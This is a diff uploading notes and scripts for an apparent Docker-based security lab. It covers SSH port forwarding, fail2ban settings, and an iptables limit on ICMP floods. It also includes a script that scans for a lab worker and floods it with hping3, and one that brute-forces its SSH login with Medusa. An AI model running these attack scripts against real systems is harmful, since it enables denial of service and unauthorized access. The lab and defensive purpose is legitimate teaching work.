Upload files to ''

docker notes.txt

@@ -0,0 +1,62 @@
+../install/usr/share/swarmlab.io/sec/swarmlab-sec up size=5
+../install/usr/share/swarmlab.io/sec/swarmlab-sec login
+
+
+
+
+/*ssh local forwarding*/
+{
+sudo apt install lynx -y		(προγραμμα για link σε ένα host port)
+sudo apt install apache2 -y		(κατεβασμα apache στον worker που θα κάνει forward)	
+apache2ctl start			(εκκίνηση apache server)
+
+lynx localhost
+netstat -antlupe|grep 80
+ssh docker@workerforw -L 5000:workerforw:80	(σύνδεση στην υπηρεσία από οποιοδήποτε container)
+
+lynx http://localhost:5000
+}
+
+/*ssh remote forwarding*/
+{
+ssh -R 5000:localhost:80 docker@remotehost	(execute at container with service on port 80)
+lynx localhost:5000				(execute at remotehost)
+}
+
+
+
+
+{
+inventory.yml
+run.sh
+test.yml
+} after all clusters' ips are in inventory, we go:
+
+chmod +x ./run.sh
+./run.sh
+
+
+
+
+
+
+
+
+
+/*shut down cluster*/
+../install/usr/share/swarmlab.io/sec/swarmlab-sec down
+
+
+#in case docker images are full
+docker rmi -f $(docker images -a -q)
+docker rm -f $(docker container -a -q)
+
+/*fail2ban config*/
+{
+filter				(fail2ban looks for the sshd service)
+logpath			(stores all authentication attempts made)
+maxretry			(bans IP after 4 wrong passwords)
+bantime			(86400 = 1 day)
+ignoreip			(type sys admin ip here)
+}
+

fail2baninfo.txt

@@ -0,0 +1,7 @@
+[sshd]
+enabled = true
+port = ssh
+filter = sshd
+logpath = /var/log/auth.log
+maxretry = 4
+bantime = 86400

master_icmp_ddos.sh

@@ -0,0 +1,15 @@
+sudo apt update
+sudo apt upgrade -y
+sudo apt install hping3 -y
+netip=$(ifconfig|grep inet|sed -n 1p|awk "{print \$2}"|cut -f 1-3 -d "."|sed 's/$/.*/')
+clear
+echo "Target network: " $netip
+#Find worker1 victim IP
+worker1=$(nmap -sP $netip|grep my_project_worker_1.my_project_net|awk '{print $NF}'|tr -d '()')
+#Ddos attack to worker1 with syn flood at port 80 and icmp protocol
+echo "Initiate attack towards worker 1 with IP: "$worker1
+sudo hping3 -p 80 --flood --icmp $worker1
+
+
+
+

ssh_medusa.sh

@@ -0,0 +1,8 @@
+sudo apt update
+sudo apt upgrade -y
+sudo apt install medusa -y
+echo "Finding victim worker IP"
+netip=$(ifconfig|grep inet|sed -n 1p|awk "{print \$2}"|cut -f 1-3 -d "."|sed 's/$/.*/')
+worker1=$(nmap -sP $netip|grep my_project_worker_1.my_project_net|awk '{print $NF}'|tr -d '()')
+echo "Starting ssh brute force attack with medusa"
+medusa -u docker -P dictionary.txt -h $worker1 -M ssh

worker_ddos_firewall.sh

@@ -0,0 +1,23 @@
+sudo apt update
+sudo apt upgrade -y
+#Find worker1 IP
+worker1=$(ifconfig|grep inet|sed -n lp|awk "{print \$2}")
+clear
+sudo iptables -F
+echo "2 sec ICMP packet sniffing"
+sleep 2s
+sudo timeout 2s tcpdump -i eth0 icmp $worker1
+sleep 2s
+echo "New iptables rules"
+#clean iptables rules from previous script runs
+sudo iptables -X
+sudo iptables -N icmp_flood
+sudo iptables -A INPUT -p icmp -j icmp_flood
+#limit icmp_flood to 1 packets per second
+sudo iptables -A icmp_flood -m limit --limit 1/s --limit-burst 3 -j RETURN
+sudo iptables -A icmp_flood -j DROP
+sleep 2s
+echo "2 sec ICMP packet sniffing after iptables config"
+sleep 2s
+sudo timeout 2s tcpdump -i eth0 icmp $worker1
+